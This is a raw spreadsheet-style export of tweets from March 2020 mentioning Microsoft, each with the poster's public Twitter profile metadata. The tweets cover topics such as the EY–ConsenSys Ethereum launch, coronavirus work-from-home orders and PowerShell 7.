    <t>{'id': 116681021, 'id_str': '116681021', 'name': 'George', 'screen_name': 'comm_ent', 'location': '', 'description': 'Think.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 489, 'friends_count': 869, 'listed_count': 5, 'created_at': 'Tue Feb 23 08:06:11 +0000 2010', 'favourites_count': 20628, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8522,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'http://pbs.twimg.com/profile_images/1147956239126712328/g6ZbgKBJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1147956239126712328/g6ZbgKBJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/116681021/1365198117',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</si>
  <si>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07:51:58 +0000 2020</t>
  </si>
  <si>
    <t>@Clawford A device that is integrated with apps like #Skype #Microsoft Lync #Google #Hangouts #WebEx Meetings #Polycom RealPresence #Cisco Jabber #LifeSize ClearSea #Vidyo and #BlueJeans. #Prijector #Newyear2020 https://t.co/ZpFewqrIFs</t>
  </si>
  <si>
    <t>{'id': 3239737873, 'id_str': '3239737873', 'name': 'â˜• Charlie Johnson', 'screen_name': 'jcharlie007', 'location': 'New York, USA', 'description': 'Entrepreneur &amp; Business Development Manager - Emerging tech, partnership dev, monetization, innovation, marketing, ideation, &amp; startups.', 'url': 'https://t.co/4acnY93ROA', 'entities': {'url': {'urls': [{'url': 'https://t.co/4acnY93ROA', 'expanded_url': 'https://www.facebook.com/jcharlie007', 'display_url': 'facebook.com/jcharlie007', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 427, 'friends_count': 1093, 'listed_count': 31, 'created_at': 'Mon Jun 08 09:27:01 +0000 2015', 'favourites_count': 541, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9438,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'http://pbs.twimg.com/profile_images/610426522487271425/CIvYwUBZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/610426522487271425/CIvYwUBZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3239737873/1508755501',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</si>
  <si>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Thu Mar 05 07:42:41 +0000 2020</t>
  </si>
  <si>
    <t>I am trying to reach https://t.co/STFpgLLPqX  but at signin, it keeps me looping back to https://t.co/RON3osa3ky
Any ideas? #microsoft #login #office365account https://t.co/odnfYfY4I4</t>
  </si>
  <si>
    <t>{'id': 41337154, 'id_str': '41337154', 'name': 'Marcel Brinkkemper', 'screen_name': 'macbrink', 'location': 'Netherlands', 'description': 'Teacher | C# | ASP. NET | MVC | SQL | HTML5 | CSS3 | Javascript | Scrum | ADHD | Dutch', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 404, 'friends_count': 764, 'listed_count': 44, 'created_at': 'Wed May 20 11:04:05 +0000 2009', 'favourites_count': 530, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8021,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'http://pbs.twimg.com/profile_images/1055572239188484097/dlEIz1ft_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1055572239188484097/dlEIz1ft_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41337154/1582200587', 'profile_link_color': '68217A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': '3D1957', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 07:41:33 +0000 2020</t>
  </si>
  <si>
    <t>EY, Microsoft and ConsenSys Launch Enterprise Platform on Ethereum Mainnet https://t.co/8QookDUBzB #SmartContracts #Ethereum #Microsoft #ConsenSys https://t.co/W5TBJiNJt7</t>
  </si>
  <si>
    <t>{'id': 288638912, 'id_str': '288638912', 'name': 'à¸¿ittrail', 'screen_name': '___CryptoNews', 'location': 'United Arab Emirates', 'description': 'Crypto news as it happens. #bitcoin #crypto #blockchain #decentralized #cryptotrader', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2166, 'friends_count': 2165, 'listed_count': 82, 'created_at': 'Wed Apr 27 06:25:55 +0000 2011', 'favourites_count': 280, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 266488,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'http://pbs.twimg.com/profile_images/1060780808301101056/7PsWzgKa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060780808301101056/7PsWzgKa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/288638912/1582839789', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'F5F3DC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 07:41:32 +0000 2020</t>
  </si>
  <si>
    <t>EY, Microsoft and ConsenSys Launch Enterprise Platform on Ethereum Mainnet https://t.co/BDuCDeV3W8 #Ethereum #EY #ErnstYoung #Microsoft #ConsenSys</t>
  </si>
  <si>
    <t>Thu Mar 05 07:41:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft OneNote Used To Sidestep #Phishing Detection: - #cybersecurity https://t.co/pnfDO8wTUg via @threatpost</t>
  </si>
  <si>
    <t>{'id': 816253996507820033, 'id_str': '816253996507820033', 'name': 'AcidTechnologies', 'screen_name': 'AcidTec', 'location': '', 'description': "While cyber criminality keeps growing, Acid Technologies offers real-time detection and alerts to protect your business' online presence and confidential data.", 'url': 'https://t.co/MBZKkilZdQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/MBZKkilZdQ', 'expanded_url': 'http://acid-tech.co/', 'display_url': 'acid-tech.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 269, 'friends_count': 95, 'listed_count': 63, 'created_at': 'Tue Jan 03 12:04:52 +0000 2017', 'favourites_count': 550, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8765, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/816255923987611648/kbz3JWDM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/816255923987611648/kbz3JWDM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/816253996507820033/1483527325',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</si>
  <si>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07:37:33 +0000 2020</t>
  </si>
  <si>
    <t>#Ethereum #EY #ErnstYoung #Microsoft #ConsenSys EY, Microsoft and ConsenSys Launch Enterprise Platform on Ethereum Mainnet https://t.co/tUDqrpQxhr https://t.co/HV431Koijz</t>
  </si>
  <si>
    <t>Thu Mar 05 07:37:15 +0000 2020</t>
  </si>
  <si>
    <t>Well played. And very classy, #microsoft 
PCWorld: Microsoft's solution for COVID-19 is a free Teams subscription for six months.
 #emyode #microsoftteams #teams https://t.co/zxco1pO9fz</t>
  </si>
  <si>
    <t>{'id': 912303946840014849, 'id_str': '912303946840014849', 'name': 'Jean-Paul Lizotte', 'screen_name': 'EmyodeJPL', 'location': 'MontrÃ©al, QuÃ©bec', 'description': 'DevOPS Practice leadðŸ§©', 'url': 'https://t.co/GDcuKPCd0O', 'entities': {'url': {'urls': [{'url': 'https://t.co/GDcuKPCd0O', 'expanded_url': 'http://www.emyode.com/', 'display_url': 'emyode.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Mon Sep 25 13:13:05 +0000 2017', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 325,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'http://pbs.twimg.com/profile_images/912304795658092544/MDlRchEu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/912304795658092544/MDlRchEu_normal.jpg',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</si>
  <si>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07:37:11 +0000 2020</t>
  </si>
  <si>
    <t>Few Microsoft products that failed terribly!
.
We provide various Development, IT, Digital Marketing and many other services.
Follow us on instagram: https://t.co/ODOFgQH5Fx
#digital #marketing #microsoft #window #services #business #internet #digitalmarketing #ideas #Connect https://t.co/k9ZJam3U3S</t>
  </si>
  <si>
    <t>{'id': 3239146921, 'id_str': '3239146921', 'name': 'Connect Globes', 'screen_name': 'connectglobes', 'location': 'India,USA', 'description': 'leading #web &amp; #mobileapp Development Company Helping 150+ Fortune by offering their services to build stronger businesses #Digital, Hire #Designer #Developer', 'url': 'https://t.co/nyoXurs4H3', 'entities': {'url': {'urls': [{'url': 'https://t.co/nyoXurs4H3', 'expanded_url': 'http://www.connectglobes.com', 'display_url': 'connectglobes.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 71, 'listed_count': 0, 'created_at': 'Sun Jun 07 17:53:22 +0000 2015', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1204630453619056640/KJVhkEmb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204630453619056640/KJVhkEmb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3239146921/1580273878',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</si>
  <si>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07:37:02 +0000 2020</t>
  </si>
  <si>
    <t>EY, Microsoft and ConsenSys Launch Enterprise Platform on #ethereum Mainnet #EY #Microsoft #SmartContracts #ConsenSys #Enterprise #Chainlink https://t.co/bTxsXAsOXK</t>
  </si>
  <si>
    <t>{'id': 2281314234, 'id_str': '2281314234', 'name': 'BitcoinAgile', 'screen_name': 'bitcoinagile', 'location': "Matter Doesn't Matter", 'description': 'Breaking News. Bitcoin, Blockchain &amp; Beyond. #bitcoin #blockchain #ethereum #cryptocurrency #crypto #trading #TA #charts $btc $eth', 'url': 'https://t.co/0PAI4x0LoK', 'entities': {'url': {'urls': [{'url': 'https://t.co/0PAI4x0LoK', 'expanded_url': 'http://bitcoinagile.com', 'display_url': 'bitcoinagile.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52314, 'friends_count': 13144, 'listed_count': 7218, 'created_at': 'Tue Jan 07 23:52:46 +0000 2014', 'favourites_count': 2924, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 956082,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'http://pbs.twimg.com/profile_images/902617531109617665/-5e-1IJw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/902617531109617665/-5e-1IJw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2281314234/1422172470', 'profile_link_color': 'E66A3F',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</si>
  <si>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07:35:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft asks staff in #Seattle area, Silicon Valley to work from home https://t.co/IbXUldK4Vg #SiliconValley #California #coronavirus #virus #health #WHO #CDC #WallStreet #Nasdaq #BillGates #economy #work #growth #inflation #Fed #rates #Powell #Trump #dollar #yuan #China #fx</t>
  </si>
  <si>
    <t>Thu Mar 05 07:33:46 +0000 2020</t>
  </si>
  <si>
    <t>Great gift for a guy who is registered on my site! #Fort Collins   #fortnite #microsoft https://t.co/NrdyoXjdjK</t>
  </si>
  <si>
    <t>{'id': 1235332603823214594, 'id_str': '1235332603823214594', 'name': 'Katie Medina', 'screen_name': 'paytempwealti', 'location': 'Salem, USA', 'description': 'Come live in my heart and pay no rent.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 22, 'listed_count': 0, 'created_at': 'Wed Mar 04 22:33:44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'http://pbs.twimg.com/profile_images/1235351262180368384/9pv3QOk2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235351262180368384/9pv3QOk2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235332603823214594/1583365707',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</si>
  <si>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07:30:22 +0000 2020</t>
  </si>
  <si>
    <t>#GoldPartner #Microsoft #Salesforce use #Prosci framework for #cloudadoption #accelerateadoption engaging leaders and end-users with #adkar - #getcertified in Neuchatel 25.-27.03. register here: https://t.co/MAa555e8y4  (3 training days, 2 overnight stays, meals, all included) https://t.co/4qj7ihq5mF</t>
  </si>
  <si>
    <t>{'id': 4109929491, 'id_str': '4109929491', 'name': 'Kostrzewa Accelerate Adoption', 'screen_name': 'AccelerateAdopt', 'location': 'Kilchberg (ZH), Schweiz', 'description': '| Change Management Consultant with #Prosci Certified Advanced Instructor expertise | ProsciÂ® Consulting D-A-CH | #AccelerateAdoption is @AllyAllez |', 'url': 'https://t.co/T1yf0q7wIN', 'entities': {'url': {'urls': [{'url': 'https://t.co/T1yf0q7wIN', 'expanded_url': 'https://www.linkedin.com/in/accelerateadoption/', 'display_url': 'linkedin.com/in/accelerateaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 344, 'friends_count': 423, 'listed_count': 215, 'created_at': 'Wed Nov 04 06:09:10 +0000 2015', 'favourites_count': 2412, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10893,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'http://pbs.twimg.com/profile_images/1057157370986545152/F4VVlDO1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1057157370986545152/F4VVlDO1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4109929491/1573729027',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</si>
  <si>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07:29:52 +0000 2020</t>
  </si>
  <si>
    <t>I'm hosting a session about #datapipelines and #IoT at #Microsoft #Techdays in #Helsinki. Come and say hi at @futurice stand if you are around! https://t.co/WTLQg5m68g</t>
  </si>
  <si>
    <t>{'id': 467751189, 'id_str': '467751189', 'name': 'Saman Ahmadi', 'screen_name': 'samanax', 'location': 'London, England', 'description': 'Cloud and enterprise architect, working with #Azure and #Microsoft stack at @futurice. Business builder and a co-founder of @digiillustrated.', 'url': 'https://t.co/kpoFyHlL8W', 'entities': {'url': {'urls': [{'url': 'https://t.co/kpoFyHlL8W', 'expanded_url': 'http://www.samanax.com', 'display_url': 'samanax.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 92, 'friends_count': 188, 'listed_count': 7, 'created_at': 'Wed Jan 18 20:17:21 +0000 2012', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1044531981550325762/eB9kyHCD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1044531981550325762/eB9kyHCD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/467751189/1543584195',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</si>
  <si>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07:25:47 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Partner Thursday Alert  
Forbes - Microsoft, EY and ConsenSys to Make the Public Ethereum Blockchain Safe for Enterprises.
#partner #microsoft #ey #consensys #blockchain #ethereum #fintech https://t.co/xjzQy9RMyN</t>
  </si>
  <si>
    <t>{'id': 4141500874, 'id_str': '4141500874', 'name': 'Lory Kehoe', 'screen_name': 'LoryKehoe', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 896, 'friends_count': 1247, 'listed_count': 20, 'created_at': 'Sun Nov 08 11:54:53 +0000 2015', 'favourites_count': 656, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 497,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'http://pbs.twimg.com/profile_images/848271377052442625/-xaGmTLH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/848271377052442625/-xaGmTLH_normal.jpg',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</si>
  <si>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07:25:19 +0000 2020</t>
  </si>
  <si>
    <t>"#Microsoft and #Cisco this week announced the "seamless integration" of the two companies' Internet of Things (#IoT) and #cloud products, enabling more #edge #computing scenarios."
https://t.co/aD9VIdrxnX</t>
  </si>
  <si>
    <t>{'id': 981127999213965312, 'id_str': '981127999213965312', 'name': 'KR2 Consulting', 'screen_name': 'kr2consulting', 'location': 'Deutschland', 'description': 'IT Infrastructure Recruitment - Follow us for industry news, jobs and insights! #ITnetworking #LAN #WAN #Security #SystemAdministration', 'url': 'https://t.co/4ZCou2MGaP', 'entities': {'url': {'urls': [{'url': 'https://t.co/4ZCou2MGaP', 'expanded_url': 'http://www.kr2consulting.com', 'display_url': 'kr2consulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 129, 'listed_count': 3, 'created_at': 'Tue Apr 03 11:15:18 +0000 2018', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 384, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/981502209987837952/OBBFM2IS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981502209987837952/OBBFM2IS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/981127999213965312/1522850430',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</si>
  <si>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07:23:11 +0000 2020</t>
  </si>
  <si>
    <t>Introducing the #EY #Baseline #protocol in collaboration with #Microsoft &amp;amp; #ConsenSys, a new package of public domain #blockchain tools that will allow enterprises to build and deploy procurement and other business processes secure...https://t.co/ogenYBYN5Q https://t.co/UGhQM9tJ9v</t>
  </si>
  <si>
    <t>{'id': 62098160, 'id_str': '62098160', 'name': 'Philippe Limantour', 'screen_name': 'plimantour', 'location': 'Paris, France', 'description': '#Artificial #Intelligence #AI #IA #NLP #DeepLearning #Blockchain #Innovation #RPA', 'url': 'https://t.co/P4nFtqSLmS', 'entities': {'url': {'urls': [{'url': 'https://t.co/P4nFtqSLmS', 'expanded_url': 'http://www.limantour.fr', 'display_url': 'limantour.fr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 730, 'friends_count': 377, 'listed_count': 419, 'created_at': 'Sat Aug 01 19:17:41 +0000 2009', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11369,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'http://pbs.twimg.com/profile_images/1205814292957843456/LD8kzHUw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205814292957843456/LD8kzHUw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/62098160/1537956581',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</si>
  <si>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07:18:24 +0000 2020</t>
  </si>
  <si>
    <t>New #PowerApps Blog post: Crisis Communication: a Power Platform template
What an awesome initiative, #Microsoft!
https://t.co/uwc3zmEuUC</t>
  </si>
  <si>
    <t>{'id': 3309075131, 'id_str': '3309075131', 'name': 'Rebekka Aalbers #PowerAddict #ProCodeNoCodeUnite', 'screen_name': 'RebekkaAalbers', 'location': 'The Netherlands', 'description': '#PowerApps &amp; #PowerAutomate geek | PowerUser/Citizen developer supporter | ðŸ’–â¤ðŸ’— #Unicorns  | Book nerd to the core | Microsoft Business Applications MVP', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 779, 'friends_count': 493, 'listed_count': 17, 'created_at': 'Fri Jun 05 09:04:48 +0000 2015', 'favourites_count': 2816, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1326,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'http://pbs.twimg.com/profile_images/1177281502217945093/t5cgNJMM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177281502217945093/t5cgNJMM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3309075131/1582223679',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</si>
  <si>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07:18:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft lanceert ultieme Powershell 7 https://t.co/JinHfeNShZ #Devops #Microsoft #PowerShell #powershell7 @techzinebe https://t.co/G3Vef8sY5U</t>
  </si>
  <si>
    <t>{'id': 966850295425888256, 'id_str': '966850295425888256', 'name': 'Techzine BelgiÃ«', 'screen_name': 'techzinebe', 'location': '', 'description': 'Techzine maakt technologie begrijpbaar voor bedrijven, met dagelijks nieuws en analyse van de laatste ontwikkelingen in IT.', 'url': 'https://t.co/gmGj4UkYVa', 'entities': {'url': {'urls': [{'url': 'https://t.co/gmGj4UkYVa', 'expanded_url': 'https://www.techzine.be', 'display_url': 'techzine.be', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 557, 'friends_count': 332, 'listed_count': 12, 'created_at': 'Fri Feb 23 01:40:48 +0000 2018', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8097, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1054754738691039233/X4hStzww_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1054754738691039233/X4hStzww_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/966850295425888256/1540308138',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</si>
  <si>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07:16:12 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/KwrBw3iTPZ</t>
  </si>
  <si>
    <t>Thu Mar 05 07:14:32 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB52hSFh</t>
  </si>
  <si>
    <t>Thu Mar 05 07:13:27 +0000 2020</t>
  </si>
  <si>
    <t>I just published Top 3 SharePoint Migration Tools of 2020 https://t.co/NPCz54gUxV
#SharePoint #Mover #Sharegate #Microsoft #Migrationtools #SharePointOnlineMigration</t>
  </si>
  <si>
    <t>{'id': 847060007233507330, 'id_str': '847060007233507330', 'name': 'Rajesh Kumar A', 'screen_name': 'getmeatrajesh', 'location': 'Hyderabad, India', 'description': 'SEO Specialist - https://t.co/paaAKNGJ5I - @saketadotcom &amp; https://t.co/2j5IEVBk7M @technovertinc', 'url': 'https://t.co/sgovgdbYX4', 'entities': {'url': {'urls': [{'url': 'https://t.co/sgovgdbYX4', 'expanded_url': 'https://about.me/rajesh-SEO', 'display_url': 'about.me/rajesh-SEO', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/paaAKNGJ5I', 'expanded_url': 'http://Saketa.com', 'display_url': 'Saketa.com', 'indices': [17, 40]}, {'url': 'https://t.co/2j5IEVBk7M', 'expanded_url': 'http://Technovert.com', 'display_url': 'Technovert.com', 'indices': [59, 82]}]}}, 'protected': False, 'followers_count': 108, 'friends_count': 429, 'listed_count': 2, 'created_at': 'Wed Mar 29 12:16:58 +0000 2017', 'favourites_count': 126, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/847061306716962816/3IKNGMJK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/847061306716962816/3IKNGMJK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/847060007233507330/1528819348', 'profile_link_color': '164851',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</si>
  <si>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07:11:50 +0000 2020</t>
  </si>
  <si>
    <t>A woman is a flower that blossoms in all its glory only in the hands of a caring and attentive man   #Overland Park   #microsoft #gold https://t.co/OxGJAKGg14</t>
  </si>
  <si>
    <t>{'id': 1235346345449443329, 'id_str': '1235346345449443329', 'name': 'Jasmine Brown', 'screen_name': 'dangbermufor', 'location': 'Cincinnati, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Wed Mar 04 23:28:21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'http://pbs.twimg.com/profile_images/1235353275425271810/bsxDYx-b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235353275425271810/bsxDYx-b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235346345449443329/1583366182',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</si>
  <si>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07:10:01 +0000 2020</t>
  </si>
  <si>
    <t>On this weeks show we look at modernising all of the things, as I catch up with @mcbride_ruairi &amp;amp; @jabenedicic at #Microsoft Ignite in London to discuss modenisation of IT applications, datacentres and thinking interesting ideas - have a listen  https://t.co/ggz1FDLtnw https://t.co/kXDGNmC6aR</t>
  </si>
  <si>
    <t>{'id': 452154892, 'id_str': '452154892', 'name': 'Paul Stringfellow', 'screen_name': 'techstringy', 'location': 'Liverpool', 'description': 'Director of IT consultancy @gardnersystems in Liverpool, Member of  #NetAppATeam #VeeamVanguard CRN A-List 2019, Host of Tech Interviews https://t.co/RuhdwiZTML', 'url': 'https://t.co/jhbHQSA7Xq', 'entities': {'url': {'urls': [{'url': 'https://t.co/jhbHQSA7Xq', 'expanded_url': 'http://techstringy.com', 'display_url': 'techstringy.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/RuhdwiZTML', 'expanded_url': 'http://podcast.techstringy.com', 'display_url': 'podcast.techstringy.com', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 2413, 'friends_count': 2034, 'listed_count': 124, 'created_at': 'Sun Jan 01 13:51:38 +0000 2012', 'favourites_count': 10347, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15154,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'http://pbs.twimg.com/profile_images/828993024730472449/NHI0gKkJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/828993024730472449/NHI0gKkJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/452154892/1578400376',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</si>
  <si>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07:09:42 +0000 2020</t>
  </si>
  <si>
    <t>New portrait... #drawing #Sketching #sketchbook #sketch #cat #portraitartist #doodle #artragepro #artrage #surfacepro #artist #pencildrawing #draw_portrait #microsoft #beard #edc_cooperative #artist... https://t.co/NCcwvNNZWE</t>
  </si>
  <si>
    <t>Thu Mar 05 07:08:39 +0000 2020</t>
  </si>
  <si>
    <t>@ZDNet *nix systems already have more powerful shells &amp;amp; utilities for decades. There's no need for a creepy shell a.k.a. #PowerShell from a #proprietary vendor like #Microsoft.</t>
  </si>
  <si>
    <t>{'id': 88630069, 'id_str': '88630069', 'name': 'Sunil Thakare', 'screen_name': 'thakares', 'location': 'Aurangabad (India)', 'description': 'Full Stack Developer; Perl Hacker; Software Freedom Activist, GNU/Linux, FreeBSD, Open Web &amp; Net Neutrality #Advocate, #Engineer;  #Blockchain #Crypto #Graphene', 'url': 'https://t.co/Pf0feA8yYF', 'entities': {'url': {'urls': [{'url': 'https://t.co/Pf0feA8yYF', 'expanded_url': 'https://t.me/ask2thakares', 'display_url': 't.me/ask2thakares', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 495, 'friends_count': 3767, 'listed_count': 84, 'created_at': 'Mon Nov 09 09:32:54 +0000 2009', 'favourites_count': 939, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4672,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'http://pbs.twimg.com/profile_images/1226764322451288064/gczvMDPE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226764322451288064/gczvMDPE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/88630069/1573635139', 'profile_link_color': 'E81C4F',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</si>
  <si>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Mar 05 07:03:13 +0000 2020</t>
  </si>
  <si>
    <t>Struggling to find a CRM that makes it easy to identify opportunities from pre-sales through post-selling? High-performance polymer maker #Victrex maps the opportunity with #Dynamics365. Learn more from Azuro Solutions. #Microsoft https://t.co/nx0vRe0PBK</t>
  </si>
  <si>
    <t>{'id': 3044805699, 'id_str': '3044805699', 'name': 'AzuroSolutions', 'screen_name': 'AzuroSolutions', 'location': '8 The Green, Suite #6392, Dove', 'description': 'Azuro solves business problems with technology, making the complex simple for our customers on their digital transformation journey.', 'url': 'https://t.co/w2MQdwXsty', 'entities': {'url': {'urls': [{'url': 'https://t.co/w2MQdwXsty', 'expanded_url': 'http://www.azurosolutions.com', 'display_url': 'azurosolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 448, 'friends_count': 597, 'listed_count': 17, 'created_at': 'Thu Feb 19 12:34:01 +0000 2015', 'favourites_count': 744, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2426,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'http://pbs.twimg.com/profile_images/1220264613310353408/rl_i2c_F_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220264613310353408/rl_i2c_F_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3044805699/1579856608',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</si>
  <si>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07:03:01 +0000 2020</t>
  </si>
  <si>
    <t>#YesBank's journey from #Microsoft to #SBI is like a #bachelor's journey from #Tinder to #Jeevansaathi, ultimately #arranged by #parents.  #YesBank</t>
  </si>
  <si>
